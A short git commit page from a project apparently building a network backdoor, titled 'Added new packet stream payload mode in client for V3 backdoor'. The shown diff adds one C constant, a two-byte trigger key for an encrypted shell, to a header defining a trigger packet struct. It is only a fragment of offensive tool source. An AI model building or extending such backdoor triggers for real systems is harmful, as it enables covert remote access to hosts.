Added new packet stream payload mode in client for V3 backdoor

This commit is contained in:
h3xduck
2022-05-07 20:45:02 -04:00
parent 5746ac5efb
commit ba19537ec1
4 changed files with 76 additions and 1 deletions

View File

@@ -34,6 +34,7 @@ struct trigger_t {
short unsigned int pad2;
short unsigned int crc;
};
#define CC_STREAM_TRIGGER_KEY_ENCRYPTED_SHELL "\x2C\x82"
#endif